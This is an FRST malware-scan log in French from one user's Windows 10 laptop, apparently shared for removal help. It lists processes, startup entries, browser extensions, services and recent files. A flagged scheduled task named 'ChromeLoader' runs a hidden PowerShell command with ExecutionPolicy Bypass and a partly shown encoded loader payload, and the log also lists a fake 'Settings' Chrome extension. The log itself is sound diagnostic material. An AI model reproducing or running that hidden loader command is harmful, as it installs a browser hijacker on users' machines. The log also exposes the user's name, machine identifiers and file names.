Publicité
Publicité
Format du document : text/plain
Prévisualisation
Résultats d'analyse de Farbar Recovery Scan Tool (FRST) (x64) Version: 30-01-2022
Exécuté par enzo3 (administrateur) sur DESKTOP-FSBRRTU (LENOVO 81SX) (02-02-2022 16:16:55)
Exécuté depuis C:\Users\enzo3\OneDrive\Bureau
Profils chargés: enzo3
Plate-forme: Microsoft Windows 10 Professionnel Version 20H2 19042.1466 (X64) Langue: Français (France)
Navigateur par défaut: Edge
Mode d'amorçage: Normal
==================== Processus (Avec liste blanche) =================
(Si un élément est inclus dans le fichier fixlist.txt, le processus sera arrêté. Le fichier ne sera pas déplacé.)
() [Fichier non signé] C:\ProgramData\myCANAL\nssm.exe
() [Fichier non signé] C:\Riot Games\Riot Client\RiotClientCrashHandler.exe
(Discord Inc. -> Discord Inc.) C:\Users\enzo3\AppData\Local\Discord\app-1.0.9003\Discord.exe <12>
(Dolby Laboratories, Inc. -> ) C:\Program Files\Common Files\Dolby\DAX3\RADARHOST\DSRHost.exe
(Dolby Laboratories, Inc. -> ) C:\Windows\System32\dolbyaposvc\DAX3API.exe <2>
(Epic Games Inc. -> Epic Games, Inc.) C:\Program Files (x86)\Epic Games\Launcher\Engine\Binaries\Win64\EpicWebHelper.exe <2>
(Epic Games Inc. -> Epic Games, Inc.) C:\Program Files (x86)\Epic Games\Launcher\Portal\Binaries\Win64\EpicGamesLauncher.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe <36>
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Update\1.3.36.122\GoogleCrashHandler.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Update\1.3.36.122\GoogleCrashHandler64.exe
(Groupe Canal+ -> ) C:\ProgramData\myCANAL\myCANAL.Service.exe
(Intel Corporation -> Intel Corporation) C:\Windows\System32\DriverStore\FileRepository\dptf_cpu.inf_amd64_9196e89091d8bdbb\esif_uf.exe
(Intel Corporation -> Intel Corporation) C:\Windows\System32\DriverStore\FileRepository\lms.inf_amd64_fddb643595e0b8d0\LMS.exe
(Intel(R) Embedded Subsystems and IP Blocks Group -> Intel Corporation) C:\Windows\System32\DriverStore\FileRepository\dal.inf_amd64_0b214be229a13e84\jhi_service.exe
(Intel(R) Rapid Storage Technology -> Intel Corporation) C:\Windows\System32\DriverStore\FileRepository\iaahcic.inf_amd64_120314e52c04567c\RstMwService.exe
(Microsoft Corporation -> Microsoft Corporation) C:\Program Files (x86)\Microsoft\Edge\Application\97.0.1072.76\identity_helper.exe
(Microsoft Corporation -> Microsoft Corporation) C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe <8>
(Microsoft Corporation -> Microsoft Corporation) C:\Program Files\Microsoft OneDrive\22.002.0103.0004\FileCoAuth.exe
(Microsoft Corporation -> Microsoft Corporation) C:\Program Files\Microsoft OneDrive\OneDrive.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\ImmersiveControlPanel\SystemSettings.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\dllhost.exe <3>
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\GameBarPresenceWriter.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\MoUsoCoreWorker.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\smartscreen.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\Taskmgr.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\wlanext.exe
(Microsoft Windows Hardware Compatibility Publisher -> ) C:\Windows\System32\FMAPP.exe
(Microsoft Windows Hardware Compatibility Publisher -> Fortemedia) C:\Windows\System32\FMService64.exe
(Microsoft Windows Publisher -> Microsoft Corporation) C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2111.5-0\MpCopyAccelerator.exe
(Microsoft Windows Publisher -> Microsoft Corporation) C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2111.5-0\MsMpEng.exe
(Microsoft Windows Publisher -> Microsoft Corporation) C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2111.5-0\NisSrv.exe
(NVIDIA Corporation -> NVIDIA Corporation) C:\Windows\System32\DriverStore\FileRepository\nvlt.inf_amd64_04baa46c48be5bb8\Display.NvContainer\NVDisplay.Container.exe <2>
(Realtek Semiconductor Corp. -> Realtek Semiconductor) C:\Windows\System32\RtkAudUService64.exe <2>
(Riot Games, Inc. -> CN) C:\Riot Games\VALORANT\live\ShooterGame\Binaries\Win64\VALORANT-Win64-Shipping.exe
(Riot Games, Inc. -> Epic Games, Inc.) C:\Riot Games\VALORANT\live\Engine\Binaries\Win64\UnrealCEFSubProcess.exe
(Riot Games, Inc. -> Riot Games) C:\Riot Games\VALORANT\live\VALORANT.exe
(Riot Games, Inc. -> Riot Games, Inc.) C:\Program Files\Riot Vanguard\vgc.exe
(Riot Games, Inc. -> Riot Games, Inc.) C:\Program Files\Riot Vanguard\vgtray.exe
(Riot Games, Inc. -> Riot Games, Inc.) C:\Riot Games\Riot Client\RiotClientServices.exe
(Swift Media Entertainment, Inc. -> Blitz, Inc.) C:\Users\enzo3\AppData\Local\Programs\Blitz\Blitz.exe <11>
==================== Registre (Avec liste blanche) ===================
(Si un élément est inclus dans le fichier fixlist.txt, l'élément de Registre sera restauré à la valeur par défaut ou supprimé. Le fichier ne sera pas déplacé.)
HKLM\...\Run: [RtkAudUService] => C:\WINDOWS\System32\RtkAudUService64.exe [1076728 2020-03-24] (Realtek Semiconductor Corp. -> Realtek Semiconductor)
HKLM\...\Run: [Riot Vanguard] => C:\Program Files\Riot Vanguard\vgtray.exe [3183328 2021-11-30] (Riot Games, Inc. -> Riot Games, Inc.)
HKU\S-1-5-21-3419220990-238505790-198961922-1001\...\Run: [OneDrive] => C:\Program Files\Microsoft OneDrive\OneDrive.exe [2593128 2022-01-20] (Microsoft Corporation -> Microsoft Corporation)
HKU\S-1-5-21-3419220990-238505790-198961922-1001\...\Run: [EpicGamesLauncher] => C:\Program Files (x86)\Epic Games\Launcher\Portal\Binaries\Win64\EpicGamesLauncher.exe [33637856 2022-01-31] (Epic Games Inc. -> Epic Games, Inc.)
HKU\S-1-5-21-3419220990-238505790-198961922-1001\...\Run: [Discord] => C:\Users\enzo3\AppData\Local\Discord\Update.exe [1512760 2020-12-03] (Discord Inc. -> GitHub)
HKU\S-1-5-21-3419220990-238505790-198961922-1001\...\Run: [Steam] => C:\Program Files (x86)\Steam\steam.exe [4268456 2022-01-16] (Valve Corp. -> Valve Corporation)
HKU\S-1-5-21-3419220990-238505790-198961922-1001\...\Run: [com.blitz.app] => C:\Users\enzo3\AppData\Local\Programs\Blitz\Blitz.exe [121828104 2022-01-30] (Swift Media Entertainment, Inc. -> Blitz, Inc.)
HKU\S-1-5-21-3419220990-238505790-198961922-1001\...\Run: [com.squirrel.Teams.Teams] => C:\Users\enzo3\AppData\Local\Microsoft\Teams\Update.exe [2460864 2022-01-25] (Microsoft 3rd Party Application Component -> Microsoft Corporation)
HKU\S-1-5-21-3419220990-238505790-198961922-1001\...\Run: [MicrosoftEdgeAutoLaunch_791E2E07DFF3A06646456380D67EFDF8] => "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start /prefetch:5
HKLM\Software\Microsoft\Active Setup\Installed Components: [{8A69D345-D564-463c-AFF1-A69D9E530F96}] -> C:\Program Files (x86)\Google\Chrome\Application\98.0.4758.82\Installer\chrmstp.exe [2022-02-02] (Google LLC -> Google LLC)
==================== Tâches planifiées (Avec liste blanche) ============
(Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le fichier ne sera pas déplacé, sauf s'il est inscrit séparément.)
Task: {3B31DCD0-C6AE-43FC-9372-25A84935EB7D} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [156104 2020-03-26] (Google LLC -> Google LLC)
Task: {4E5CD411-3440-4969-AAD3-0F387269A77E} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan => C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2111.5-0\MpCmdRun.exe [901048 2021-12-16] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {5BB37684-BF8D-46A2-9A09-E6F056B1C8EE} - System32\Tasks\OneDrive Per-Machine Standalone Update Task => C:\Program Files\Microsoft OneDrive\OneDriveStandaloneUpdater.exe [4078440 2022-01-20] (Microsoft Corporation -> Microsoft Corporation)
Task: {600AED33-3FF3-4D5C-B056-FC2F4FB47C21} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance => C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2111.5-0\MpCmdRun.exe [901048 2021-12-16] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {72F974CB-7EDC-48EC-BBC9-D00F9FA484DD} - System32\Tasks\Microsoft\Windows\termsrv\RemoteFX\RemoteFXvGPUDisableTask => C:\WINDOWS\System32\RemoteFXvGPUDisablement.exe Disable (Pas de fichier)
Task: {76FBDBBD-A20E-40DA-805E-53D645764953} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cleanup => C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2111.5-0\MpCmdRun.exe [901048 2021-12-16] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {81E97724-97EC-49BA-91D8-2F68F74B6AFA} - System32\Tasks\Microsoft\Windows\termsrv\RemoteFX\RemoteFXWarningTask => C:\WINDOWS\System32\RemoteFXvGPUDisablement.exe Warning (Pas de fichier)
Task: {93C1356C-CE98-44C8-AA35-ED55C004FBF2} - System32\Tasks\ChromeLoader => cmd /c start /min "" powershell -ExecutionPolicy Bypass -WindowStyle Hidden -E JABlAHgAdABQAGEAdABoACAAPQAgACIAJAAoACQAZQBuAHYAOgBMAE8AQwBBAEwAQQBQAFAARABBAFQAQQApAFwAYwBoAHIAbwBtAGUAIgAKAAoAaQBmACgALQBuAG8AdAAoAFQAZQBzAHQALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAHgAdABQAGEAdABoACkAKQB7AAoACgAJACQAYQByAGMAa (l'élément de données a 1471 caractères en plus). <==== ATTENTION
Task: {B81ADD2B-0089-410C-A503-5F18AD37F79E} - System32\Tasks\OneDrive Reporting Task-S-1-5-21-3419220990-238505790-198961922-1001 => C:\Program Files\Microsoft OneDrive\OneDriveStandaloneUpdater.exe [4078440 2022-01-20] (Microsoft Corporation -> Microsoft Corporation)
Task: {DA30D77D-5910-42CA-9692-E5A4C3C4E8C7} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Verification => C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2111.5-0\MpCmdRun.exe [901048 2021-12-16] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {E2CE253F-5129-410F-9925-ED721F6A9B70} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [156104 2020-03-26] (Google LLC -> Google LLC)
(Si un élément est inclus dans le fichier fixlist.txt, le fichier tâche (.job) sera déplacé. Le fichier exécuté par la tâche ne sera pas déplacé.)
==================== Internet (Avec liste blanche) ====================
(Si un élément est inclus dans le fichier fixlist.txt, s'il s'agit d'un élément du Registre, il sera supprimé ou restauré à la valeur par défaut.)
Tcpip\Parameters: [DhcpNameServer] 172.20.10.1
Tcpip\..\Interfaces\{4a907000-c07b-4d2c-aae9-97ef07a16bf2}: [DhcpNameServer] 192.168.1.1
Tcpip\..\Interfaces\{ca465b70-6228-419a-9e70-ed2895d6acc6}: [DhcpNameServer] 172.20.10.1
Edge:
=======
Edge Extension: (Pas de nom) -> AutoFormFill_5ED10D46BD7E47DEB1F3685D2C0FCE08 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\HostExtensions\AutoFormFill [non trouvé(e)]
Edge Extension: (Pas de nom) -> BookReader_B171F20233094AC88D05A8EF7B9763E8 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\BookViewer [non trouvé(e)]
Edge Extension: (Pas de nom) -> LearningTools_7706F933-971C-41D1-9899-8A026EB5D824 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\HostExtensions\LearningTools [non trouvé(e)]
Edge Extension: (Pas de nom) -> PinJSAPI_EC01B57063BE468FAB6DB7EBFC3BF368 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\HostExtensions\PinJSAPI [non trouvé(e)]
Edge DefaultProfile: Default
Edge Profile: C:\Users\enzo3\AppData\Local\Microsoft\Edge\User Data\Default [2022-02-02]
Edge Notifications: Default -> hxxps://www.op.gg
Edge Extension: (Zotero Connector) - C:\Users\enzo3\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\nmhdhpibnnopknkmonacoephklnflpho [2021-09-27]
FireFox:
========
FF DefaultProfile: lw8c0yru.default
FF ProfilePath: C:\Users\enzo3\AppData\Roaming\Zotero\Zotero\Profiles\lw8c0yru.default [2021-04-27]
FF Plugin: @videolan.org/vlc,version=3.0.11 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2020-06-04] (VideoLAN -> VideoLAN)
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.41212.0\npctrl.dll [2015-12-11] (Microsoft Corporation -> Microsoft Corporation)
Chrome:
=======
CHR DefaultProfile: Default
CHR Profile: C:\Users\enzo3\AppData\Local\Google\Chrome\User Data\Default [2022-02-02]
CHR Notifications: Default -> hxxps://aternos.org; hxxps://www.chess.com
CHR Extension: (Slides) - C:\Users\enzo3\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2020-03-26]
CHR Extension: (Docs) - C:\Users\enzo3\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2020-03-26]
CHR Extension: (Google Drive) - C:\Users\enzo3\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2020-10-27]
CHR Extension: (YouTube) - C:\Users\enzo3\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2020-03-26]
CHR Extension: (Zotero Connector) - C:\Users\enzo3\AppData\Local\Google\Chrome\User Data\Default\Extensions\ekhagklcjbdpajgpjgmbionohlpdbjgc [2022-01-07]
CHR Extension: (Sheets) - C:\Users\enzo3\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2020-03-26]
CHR Extension: (Google Docs hors connexion) - C:\Users\enzo3\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2022-01-25]
CHR Extension: (Paiements via le Chrome Web Store) - C:\Users\enzo3\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2021-02-01]
CHR Extension: (Gmail) - C:\Users\enzo3\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2020-10-27]
CHR Extension: (Settings) - C:\Users\enzo3\AppData\Local [2022-02-02]
CHR Profile: C:\Users\enzo3\AppData\Local\Google\Chrome\User Data\Guest Profile [2021-03-24]
==================== Services (Avec liste blanche) ===================
(Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le fichier ne sera pas déplacé, sauf s'il est inscrit séparément.)
S3 BEService; C:\Program Files (x86)\Common Files\BattlEye\BEService.exe [8736880 2020-10-31] (BattlEye Innovations e.K. -> )
R2 DolbyDAXAPI; C:\WINDOWS\system32\dolbyaposvc\DAX3API.exe [1926600 2019-09-02] (Dolby Laboratories, Inc. -> )
S3 EasyAntiCheat; C:\Program Files (x86)\EasyAntiCheat\EasyAntiCheat.exe [818304 2020-10-31] (EasyAntiCheat Oy -> Epic Games, Inc)
S3 EpicOnlineServices; C:\Program Files (x86)\Epic Games\Epic Online Services\service\EpicOnlineServicesHost.exe [16029472 2021-10-26] (Epic Games Inc. -> Epic Games, Inc.)
S3 FileSyncHelper; C:\Program Files\Microsoft OneDrive\22.002.0103.0004\FileSyncHelper.exe [3354520 2022-01-20] (Microsoft Corporation -> Microsoft Corporation)
R2 FMAPOService; C:\WINDOWS\System32\FMService64.exe [359808 2019-08-15] (Microsoft Windows Hardware Compatibility Publisher -> Fortemedia)
R2 myCANAL Server; C:\ProgramData\myCANAL\nssm.exe [294912 2020-10-30] () [Fichier non signé]
S3 OneDrive Updater Service; C:\Program Files\Microsoft OneDrive\22.002.0103.0004\OneDriveUpdaterService.exe [3812248 2022-01-20] (Microsoft Corporation -> Microsoft Corporation)
S3 Sense; C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe [6137040 2022-01-12] (Microsoft Windows Publisher -> Microsoft Corporation)
R3 vgc; C:\Program Files\Riot Vanguard\vgc.exe [10429808 2021-11-30] (Riot Games, Inc. -> Riot Games, Inc.)
R3 WdNisSvc; C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2111.5-0\NisSrv.exe [2876152 2021-12-16] (Microsoft Windows Publisher -> Microsoft Corporation)
R2 WinDefend; C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2111.5-0\MsMpEng.exe [128360 2021-12-16] (Microsoft Windows Publisher -> Microsoft Corporation)
R2 NVDisplay.ContainerLocalSystem; C:\WINDOWS\System32\DriverStore\FileRepository\nvlt.inf_amd64_04baa46c48be5bb8\Display.NvContainer\NVDisplay.Container.exe -s NVDisplay.ContainerLocalSystem -f %ProgramData%\NVIDIA\NVDisplay.ContainerLocalSystem.log -l 3 -d C:\WINDOWS\System32\DriverStore\FileRepository\nvlt.inf_amd64_04baa46c48be5bb8\Display.NvContainer\plugins\LocalSystem -r -p 30000 -cfg NVDisplay.ContainerLocalSystem\LocalSystem
===================== Pilotes (Avec liste blanche) ===================
(Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le fichier ne sera pas déplacé, sauf s'il est inscrit séparément.)
R3 AppleLowerFilter; C:\WINDOWS\System32\drivers\AppleLowerFilter.sys [35976 2020-10-09] (WDKTestCert build,132303256403278908 -> Apple Inc.)
R2 speedfan; C:\Windows\SysWOW64\speedfan.sys [28664 2012-12-29] (SOKNO S.R.L. -> Almico Software)
S3 ssudmdm; C:\WINDOWS\system32\DRIVERS\ssudmdm.sys [166760 2019-09-26] (Samsung Electronics Co., Ltd. -> Samsung Electronics Co., Ltd.)
R1 vgk; C:\Program Files\Riot Vanguard\vgk.sys [8480608 2021-11-29] (Riot Games, Inc. -> Riot Games, Inc.)
S0 WdBoot; C:\WINDOWS\System32\drivers\wd\WdBoot.sys [48536 2021-12-16] (Microsoft Windows Early Launch Anti-malware Publisher -> Microsoft Corporation)
R0 WdFilter; C:\WINDOWS\System32\drivers\wd\WdFilter.sys [435432 2021-12-16] (Microsoft Windows -> Microsoft Corporation)
R3 WdNisDrv; C:\WINDOWS\System32\drivers\wd\WdNisDrv.sys [86248 2021-12-16] (Microsoft Windows -> Microsoft Corporation)
==================== NetSvcs (Avec liste blanche) ===================
(Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le fichier ne sera pas déplacé, sauf s'il est inscrit séparément.)
==================== Un mois (créés) (Avec liste blanche) =========
(Si un élément est inclus dans le fichier fixlist.txt, le fichier/dossier sera déplacé.)
2022-02-02 16:16 - 2022-02-02 16:17 - 000000000 ____D C:\FRST
2022-01-27 11:03 - 2022-01-27 11:03 - 000493461 _____ C:\Users\enzo3\Downloads\tp1_vecteur.zip
2022-01-24 14:38 - 2022-01-24 14:38 - 000129515 _____ C:\Users\enzo3\Downloads\Dossier_de_consignes_CC1.pdf
2022-01-24 14:35 - 2022-01-24 14:35 - 003618859 _____ C:\Users\enzo3\Downloads\20211217_NP_liste_postes_DGAMI_Cyber_2022.pdf
2022-01-24 14:06 - 2022-01-24 14:06 - 000000000 ____D C:\Users\enzo3\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Zoom
2022-01-18 14:23 - 2022-01-18 14:23 - 001152542 _____ C:\Users\enzo3\Downloads\Exo3_integrales_Lebesgue.pdf
2022-01-18 14:23 - 2022-01-18 14:23 - 000507907 _____ C:\Users\enzo3\Downloads\Exo1-correction.pdf
2022-01-18 14:23 - 2022-01-18 14:23 - 000490531 _____ C:\Users\enzo3\Downloads\Correction2suites (1).pdf
2022-01-18 14:23 - 2022-01-18 14:23 - 000387451 _____ C:\Users\enzo3\Downloads\Correction1suite (1).pdf
2022-01-17 15:44 - 2022-01-17 15:44 - 000490531 _____ C:\Users\enzo3\Downloads\Correction2suites.pdf
2022-01-17 15:39 - 2022-01-17 15:39 - 000387451 _____ C:\Users\enzo3\Downloads\Correction1suite.pdf
2022-01-12 18:25 - 2022-01-12 18:25 - 000288009 _____ C:\Users\enzo3\Downloads\formules_stats_cc2.pdf
2022-01-12 18:24 - 2022-01-12 18:24 - 000459966 _____ C:\Users\enzo3\Downloads\Controle_continu_2021-2022.pdf
2022-01-12 18:09 - 2022-01-12 18:09 - 001433439 _____ C:\Users\enzo3\Downloads\POTIN_SCHENBERG_TP2.pdf
2022-01-12 13:34 - 2022-01-12 13:34 - 000523776 _____ (curl, hxxps://curl.se/) C:\WINDOWS\system32\curl.exe
2022-01-12 13:34 - 2022-01-12 13:34 - 000464384 _____ (curl, hxxps://curl.se/) C:\WINDOWS\SysWOW64\curl.exe
2022-01-12 13:34 - 2022-01-12 13:34 - 000011797 _____ C:\WINDOWS\system32\DrtmAuthTxt.wim
2022-01-12 13:30 - 2022-01-12 13:30 - 000000000 ___HD C:\$WinREAgent
2022-01-10 13:19 - 2022-01-10 13:19 - 001012038 _____ C:\Users\enzo3\Downloads\4_-_Management_de_linnovation.pdf
2022-01-09 19:38 - 2022-01-09 19:38 - 004046778 _____ C:\Users\enzo3\Downloads\Exercices_Tuto_2_correction (2).pdf
2022-01-09 19:38 - 2022-01-09 19:38 - 001218545 _____ C:\Users\enzo3\Downloads\Maths_CC2_Entrainement_Exercices (1).pdf
2022-01-09 17:55 - 2022-01-09 17:56 - 004046778 _____ C:\Users\enzo3\Downloads\Exercices_Tuto_2_correction (1).pdf
2022-01-09 17:55 - 2022-01-09 17:55 - 001218545 _____ C:\Users\enzo3\Downloads\Maths_CC2_Entrainement_Exercices.pdf
2022-01-08 16:51 - 2022-01-08 16:52 - 003252622 _____ C:\Users\enzo3\Downloads\Notes_tuto_2.pdf
2022-01-08 16:51 - 2022-01-08 16:51 - 004046778 _____ C:\Users\enzo3\Downloads\Exercices_Tuto_2_correction.pdf
2022-01-07 15:03 - 2022-01-07 15:03 - 000082125 _____ C:\Users\enzo3\Downloads\TD1 (4).pdf
2022-01-03 20:49 - 2022-01-03 20:49 - 001816155 _____ C:\Users\enzo3\Downloads\Decathlon (2).pdf
2022-01-03 10:56 - 2022-01-03 10:56 - 000005887 _____ C:\Users\enzo3\AppData\Local\archive.zip
2022-01-03 10:56 - 2022-01-03 10:56 - 000000000 ____D C:\Users\enzo3\AppData\Local\chrome
==================== Un mois (modifiés) ==================
(Si un élément est inclus dans le fichier fixlist.txt, le fichier/dossier sera déplacé.)
2022-02-02 16:19 - 2020-03-17 11:33 - 000000000 ____D C:\Users\enzo3\AppData\Roaming\discord
2022-02-02 16:16 - 2020-04-16 14:26 - 000000000 ____D C:\Users\enzo3\AppData\Roaming\Blitz
2022-02-02 16:08 - 2020-03-26 14:21 - 000000000 ____D C:\Program Files (x86)\Google
2022-02-02 16:04 - 2019-12-07 10:03 - 000000000 ____D C:\WINDOWS\CbsTemp
2022-02-02 15:46 - 2020-04-04 20:25 - 000000000 ____D C:\Users\enzo3\AppData\Local\Discord
2022-02-02 15:33 - 2019-12-07 10:14 - 000000000 ____D C:\ProgramData\regid.1991-06.com.microsoft
2022-02-02 15:29 - 2021-11-07 11:40 - 000002170 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk
2022-02-02 15:29 - 2021-04-16 23:56 - 000000001 _____ C:\WINDOWS\vgkbootstatus.dat
2022-02-02 15:29 - 2020-11-04 18:19 - 000001161 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Zotero.lnk
2022-02-02 15:29 - 2020-07-13 15:17 - 000002442 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Edge.lnk
2022-02-02 15:29 - 2020-01-07 13:03 - 000019628 _____ C:\ProgramData\DisplaySessionContainer14.log_backup1
2022-02-02 15:29 - 2020-01-05 15:13 - 000013301 _____ C:\ProgramData\DisplaySessionContainer12.log_backup1
2022-02-02 15:29 - 2020-01-02 19:30 - 000011350 _____ C:\ProgramData\DisplaySessionContainer11.log_backup1
2022-02-02 15:29 - 2020-01-01 22:09 - 000011593 _____ C:\ProgramData\DisplaySessionContainer10.log_backup1
2022-02-02 15:29 - 2019-12-23 18:26 - 000011354 _____ C:\ProgramData\DisplaySessionContainer1.log_backup1
2022-02-02 15:29 - 2019-12-23 17:14 - 000000000 ____D C:\ProgramData\Riot Games
2022-02-02 14:30 - 2021-04-30 18:01 - 000000000 ____D C:\WINDOWS\system32\SleepStudy
2022-02-02 11:04 - 2020-03-18 20:54 - 000000000 ____D C:\Program Files (x86)\Steam
2022-02-02 10:55 - 2019-12-07 10:14 - 000000000 ___HD C:\Program Files\WindowsApps
2022-02-02 10:55 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\AppReadiness
2022-02-02 10:50 - 2021-04-30 18:08 - 001770906 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2022-02-02 10:50 - 2019-12-07 15:50 - 000794444 _____ C:\WINDOWS\system32\perfh00C.dat
2022-02-02 10:50 - 2019-12-07 15:50 - 000150558 _____ C:\WINDOWS\system32\perfc00C.dat
2022-02-02 10:50 - 2019-12-07 10:13 - 000000000 ____D C:\WINDOWS\INF
2022-02-02 10:46 - 2021-05-18 18:12 - 000000032 _____ C:\Users\enzo3\AppData\Roaming\.machineId
2022-02-02 10:45 - 2021-04-30 18:06 - 000000006 ____H C:\WINDOWS\Tasks\SA.DAT
2022-02-02 10:45 - 2021-04-30 18:00 - 000008192 ___SH C:\DumpStack.log.tmp
2022-02-02 10:45 - 2019-12-23 17:50 - 000000000 ____D C:\ProgramData\NVIDIA
2022-02-02 10:45 - 2019-12-23 12:13 - 000000134 _____ C:\WINDOWS\system32\regtest.txt
2022-02-02 10:45 - 2019-12-23 11:52 - 000000000 ___RD C:\Users\enzo3\OneDrive
2022-02-02 10:45 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\ServiceState
2022-01-31 21:17 - 2021-11-07 11:40 - 000000000 ____D C:\Program Files\Microsoft OneDrive
2022-01-31 21:16 - 2019-12-07 10:03 - 000786432 _____ C:\WINDOWS\system32\config\BBI
2022-01-30 20:16 - 2021-04-30 18:06 - 000004174 _____ C:\WINDOWS\system32\Tasks\User_Feed_Synchronization-{6C478CD6-A663-4147-92A3-153FD99F40F8}
2022-01-26 07:54 - 2021-06-30 15:58 - 000003540 _____ C:\WINDOWS\system32\Tasks\MicrosoftEdgeUpdateTaskMachineCore1d73de2c4618cee
2022-01-26 07:54 - 2021-04-30 18:06 - 000003634 _____ C:\WINDOWS\system32\Tasks\MicrosoftEdgeUpdateTaskMachineUA
2022-01-25 19:17 - 2020-09-30 11:51 - 000002364 _____ C:\Users\enzo3\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Microsoft Teams.lnk
2022-01-24 14:06 - 2021-03-16 15:16 - 000000000 ____D C:\Users\enzo3\AppData\Roaming\Zoom
2022-01-24 14:03 - 2021-04-30 18:06 - 000003590 _____ C:\WINDOWS\system32\Tasks\GoogleUpdateTaskMachineUA
2022-01-24 14:03 - 2021-04-30 18:06 - 000003466 _____ C:\WINDOWS\system32\Tasks\GoogleUpdateTaskMachineCore
2022-01-20 15:39 - 2021-12-13 16:24 - 000003588 _____ C:\WINDOWS\system32\Tasks\OneDrive Reporting Task-S-1-5-21-3419220990-238505790-198961922-1001
2022-01-20 15:39 - 2021-11-07 11:40 - 000003194 _____ C:\WINDOWS\system32\Tasks\OneDrive Per-Machine Standalone Update Task
2022-01-12 20:59 - 2021-04-30 18:01 - 000458296 _____ C:\WINDOWS\system32\FNTCACHE.DAT
2022-01-12 20:58 - 2019-12-07 15:53 - 000000000 ____D C:\Program Files\Windows Defender Advanced Threat Protection
2022-01-12 20:58 - 2019-12-07 10:14 - 000000000 ___SD C:\WINDOWS\system32\DiagSvcs
2022-01-12 20:58 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\SysWOW64\Dism
2022-01-12 20:58 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\SystemResources
2022-01-12 20:58 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\setup
2022-01-12 20:58 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\oobe
2022-01-12 20:58 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\Dism
2022-01-12 20:58 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\bcastdvr
2022-01-12 13:30 - 2019-12-24 01:30 - 000000000 ____D C:\WINDOWS\system32\MRT
2022-01-12 13:28 - 2019-12-24 01:29 - 145765912 ____C (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe
==================== Fichiers à la racine de certains dossiers ========
2021-05-18 18:12 - 2022-02-02 10:46 - 000000032 _____ () C:\Users\enzo3\AppData\Roaming\.machineId
